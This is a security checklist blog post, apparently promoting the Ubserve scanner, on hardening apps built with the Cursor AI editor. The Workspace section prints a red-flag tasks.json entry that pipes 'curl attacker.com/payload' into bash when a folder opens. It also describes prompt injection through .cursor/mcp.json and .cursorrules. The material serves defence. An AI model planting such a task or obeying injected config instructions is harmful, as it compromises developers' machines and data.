Cursor security checklist: The 7-step guide to secure the app you just built with Cursor.

A Cursor security checklist covers the seven areas AI coding tools consistently break: Workspace Trust configuration, secrets in chat history, auth logic after refactors, database tenant scoping, dependency integrity, input validation, and API hardening. Running this before every deploy closes the gap between code that works and code that is safe to ship.

Cursor's job is to make code run — not to make it secure. Before every production deploy, verify that Workspace Trust is enabled, no secrets touched agent chat history, auth middleware is still intact after refactors, and all generated npm packages are legitimate. AI coding tools like Cursor introduce a specific class of vulnerabilities that manual review alone misses: hidden task execution, prompt injection via config files, and authorization logic silently simplified out of existence.

Key Security Risks in Cursor-Built Apps

Workspace Trust bypass: Cursor inherits VS Code's Workspace Trust model, but it is effectively bypassed in rushed workflows. A malicious runOn: folderOpen task in .vscode/tasks.json executes the moment you open a cloned repo — before you read a single line of code.

Prompt injection via MCP config: .cursor/mcp.json controls which tools your AI agent can access. A file write to this path can redirect agent behavior, exfiltrate context, or execute arbitrary tool calls silently.

Typosquatted packages: Cursor suggests and installs npm packages by name. AI models have a known failure mode of suggesting plausible-sounding packages that do not exist — and attackers register those names with malicious payloads.

Auth logic simplification: When you ask Cursor to refactor authentication code, it frequently removes token expiry checks, session validation, or middleware guards because they add complexity. The app still works in testing. The security model is gone.

Secret leakage via chat: Any key pasted into Cursor chat persists in agent context. It can appear in generated code comments, logs, and suggestions. Treat every chat session as a potential secret exposure event.

Workspace & IDE Security

The first Cursor security risk starts before you write a line of code.

• Enable Workspace Trust in VS Code settings and never auto-trust unknown repos.
• Inspect .vscode/tasks.json before running anything — look for runOn: folderOpen entries.
• Review .cursor/mcp.json for tool definitions you did not add yourself.
• Never open repos from unknown sources without reviewing their config files first.
• Audit .cursorrules files for instructions that override your intended security behavior.

// Red flag in .vscode/tasks.json — executes before you read any code
{
  "version": "2.0.0",
  "tasks": [{
    "label": "setup",
    "type": "shell",
    "command": "curl attacker.com/payload | bash",
    "runOptions": { "runOn": "folderOpen" }
  }]
}

Secrets & Environment Variables

• Never paste cloud keys, JWT secrets, Stripe keys, or database URLs into Cursor chat.
• Move all runtime secrets to your hosting provider's secret store — not .env files committed to git.
• Search generated code for sk-, service_role, sk_live_, and OPENAI_API_KEY before every push.
• Add pre-commit secret scanning with gitleaks or trufflehog to catch what code review misses.
• Rotate any key that appeared in a Cursor prompt, a code suggestion, or a debug snippet.

# Scan before every commit
gitleaks detect --source . --verbose

Authentication & Route Protection

Cursor's biggest security blind spot is auth. Every refactor is a potential regression.

• Re-verify every auth guard after agent-assisted edits — especially middleware and route-level checks.
• Confirm token expiry, issuer validation, and audience checks still execute after any refactor.
• Add explicit tests for horizontal access: user A must not be able to read or modify user B's records.
• Block fallback "allow" branches that Cursor introduces for convenience.
• Test with expired tokens, forged tokens, and missing auth headers — not just the happy path.

// What Cursor often generates — no expiry check
export async function middleware(req: NextRequest) {
  const session = await getSession(req);
  if (!session) return NextResponse.redirect('/login');
  return NextResponse.next(); // ← passes with expired session
}

// What you need
export async function middleware(req: NextRequest) {
  const session = await getSession(req);
  if (!session || session.expiresAt < Date.now()) {
    return NextResponse.redirect('/login');
  }
  return NextResponse.next();
}

Database & Storage Security

• Verify tenant scoping in every query generated during Cursor-assisted refactors.
• Enforce least-privilege DB users for migrations, background jobs, and app runtime — not one shared credential.
• Confirm storage objects require signed access and ownership checks, not just filename obscurity.
• Audit ORM changes for removed where user_id = session.user_id clauses after agent edits.
• Enable RLS on all Supabase tables containing user or business data and verify policies after every migration.

Dependency Security

• Review every npm install Cursor suggests — confirm the package name, author, and download count before running.
• Run npm audit after any agent-assisted dependency change.
• Lock package versions and audit the diff in package-lock.json before merging agent branches.
• Watch for typosquatting: lodash vs lodahs, axios vs axois, express vs expres.

# After any agent-suggested install
npm audit
npx npm-check-updates

Input Validation & XSS

• Add strict schema validation with Zod or Valibot on every write endpoint Cursor generated.
• Escape rich-text and markdown content before rendering user-generated output in React.
• Reject unknown fields in API payloads — Cursor-generated APIs often accept everything by default.
• Test reflected and stored XSS in all AI-generated form flows, comment fields, and profile inputs.

// Cursor often generates this — no validation
app.post('/api/comment', async (req, res) => {
  await db.insert('comments', req.body);
});

// What you need
const CommentSchema = z.object({
  content: z.string().min(1).max(1000),
  postId: z.string().uuid(),
});
app.post('/api/comment', async (req, res) => {
  const data = CommentSchema.parse(req.body);
  await db.insert('comments', data);
});

CORS, Rate Limiting & API Hardening

• Set explicit Access-Control-Allow-Origin allowlists per environment — never wildcard in production.
• Disable wildcard CORS on any route that touches private data or user records.
• Enforce SameSite=Strict, HttpOnly, and Secure on all session cookies.
• Add IP and user-based rate limits on login, password reset, OTP, and token refresh routes.
• Protect expensive AI proxy routes and data export endpoints with burst caps.
• Return 429 with Retry-After headers and log sustained abuse spikes for investigation.

Related Security Checklists

Cursor is commonly used alongside Windsurf or for Supabase-backed apps. After completing this checklist, review the Windsurf security checklist for multi-file Cascade refactor risks and the Supabase security checklist if your app uses Supabase. For a full cross-tool pre-launch sweep, see the pre-deploy security checklist for vibe-coded apps.

Run Your Security Audit

If running this checklist manually sounds like a lot — it is. That is why we built Ubserve.

Ubserve scans your real codebase for every class of vulnerability on this checklist: exposed secrets, broken auth, missing RLS, weak CORS, and Cursor-specific security gaps. Every finding comes with a plain-English explanation and a fix prompt you paste directly back into Cursor to patch it immediately.

Audit my Cursor app for these vulnerabilities

If you worked through this carefully, you are already ahead of most teams shipping with AI. Most incidents are not dramatic. They are small gaps nobody fixed, stacked on top of each other, by a founder who trusted their AI too much.

Run the audit. Fix what it flags. Ship with confidence.

— Mr. Ballaz, Founder of Ubserve